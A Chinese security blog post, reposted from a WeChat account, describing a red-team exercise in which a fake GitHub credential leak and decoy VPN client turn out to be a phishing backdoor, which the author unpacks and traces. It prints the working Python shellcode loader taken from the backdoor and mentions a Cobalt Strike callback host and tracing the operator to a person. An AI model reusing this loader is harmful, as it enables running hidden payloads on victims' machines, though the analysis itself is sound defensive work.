记一次攻防演练中的有趣溯源分析

admin 2022年7月27日11:21:40应急响应评论18 views1929字阅读6分25秒阅读模式
声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。


文章来源:先知社区(Kat)

原文地址:https://xz.aliyun.com/t/11275


0x00 前言

在某次攻防演练信息收集的过程中,偶然发现伪装Github信息泄漏进而钓鱼红队人员的后门。


下面展开有趣的分析溯源过程。


0x01 信息收集

GIthub信息泄漏

根据甲方信息进行常规的Github敏感信息收集偶然发现一个仓库不简单

记一次攻防演练中的有趣溯源分析

这不是mysql账号密码泄漏了吗,愉快的打开Navicat

记一次攻防演练中的有趣溯源分析

失败....于是访问源码的8080端口查看一番,发现一个管理后台

记一次攻防演练中的有趣溯源分析


弱口令

针对后台尝试一波弱口令,admin/admin 嗯~进来了

记一次攻防演练中的有趣溯源分析

进来之后竟然发现账号密码而且客户端解压密码都贴心的放了出来

记一次攻防演练中的有趣溯源分析

到这里我竟然没有察觉到任何异常,以为能够拿到VPN入口权限;抓紧下载VPN客户端。


解压出来这个样子,emmm。。还没发现异常

记一次攻防演练中的有趣溯源分析

0x02 分析溯源

还好有谨慎的习惯,放入虚拟机瞅瞅。


哦豁,竟然提示不兼容当前系统;看到弹窗有Pyhton代码编写的特征。感觉到前面的打点由过于丝滑,不自然的警觉了起来。


包括前面弱口令的提交方式竟然为admin.php?user=admin&passwd=admin

记一次攻防演练中的有趣溯源分析


由于发现VPN客户端为python语言编写,更不对劲了,反编译看下。


解包

python3 pyinstxtractor.py vpnclient64.exe
记一次攻防演练中的有趣溯源分析


生成一个以 exe文件名+_extracted 的文件夹,这个就是解包后的数据
记一次攻防演练中的有趣溯源分析
记一次攻防演练中的有趣溯源分析


PyInstaller打包后,pyc文件的前8个字节会被抹掉,所以最后要自己添加回去。


添加头

根据struct.py文件
记一次攻防演练中的有趣溯源分析
记一次攻防演练中的有趣溯源分析


源码

得到py文件,easyvpn64.py为后门主程序,其中执行shellcode代码隐藏至图片中。
记一次攻防演练中的有趣溯源分析


通过requests请求OSS存储中的图片,图片内容为shellcode加载器。
记一次攻防演练中的有趣溯源分析


shellcodeLoader部分
记一次攻防演练中的有趣溯源分析


import base64import ctypes
str = b''sc_base64 = (base64.a85decode(str)).decode('utf-8')shellcode = bytearray(bytearray.fromhex((base64.b64decode(sc_base64)).decode('utf-8')))
ptr = ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)))
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))

知道shellcodeloader加载方式就好办了,提取CS回连地址。
记一次攻防演练中的有趣溯源分析


溯源

回连地址:Host: cs.xxx.cn,nslookup解析地址

记一次攻防演练中的有趣溯源分析


根据IP地址定位在某宿舍
记一次攻防演练中的有趣溯源分析


直接溯源到人,tg结合一波。
记一次攻防演练中的有趣溯源分析

0x03 总结

在攻防演练过程中一定要小心,防止被钓鱼。另外这个钓鱼的兄弟已经小本本记下了。。。



关 注 有 礼



关注公众号回复“9527”可以领取一套HTB靶场文档和视频1208”个人常用高效爆破字典0221”2020年酒仙桥文章打包2191潇湘信安文章打包,“1212”杀软对比源码+数据源,0421Windows提权工具包

记一次攻防演练中的有趣溯源分析 还在等什么?赶紧点击下方名片关注学习吧!记一次攻防演练中的有趣溯源分析


推 荐 阅 读




记一次攻防演练中的有趣溯源分析
记一次攻防演练中的有趣溯源分析
记一次攻防演练中的有趣溯源分析

记一次攻防演练中的有趣溯源分析

原文始发于微信公众号(潇湘信安):记一次攻防演练中的有趣溯源分析

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月27日11:21:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  记一次攻防演练中的有趣溯源分析 http://cn-sec.com/archives/1203491.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: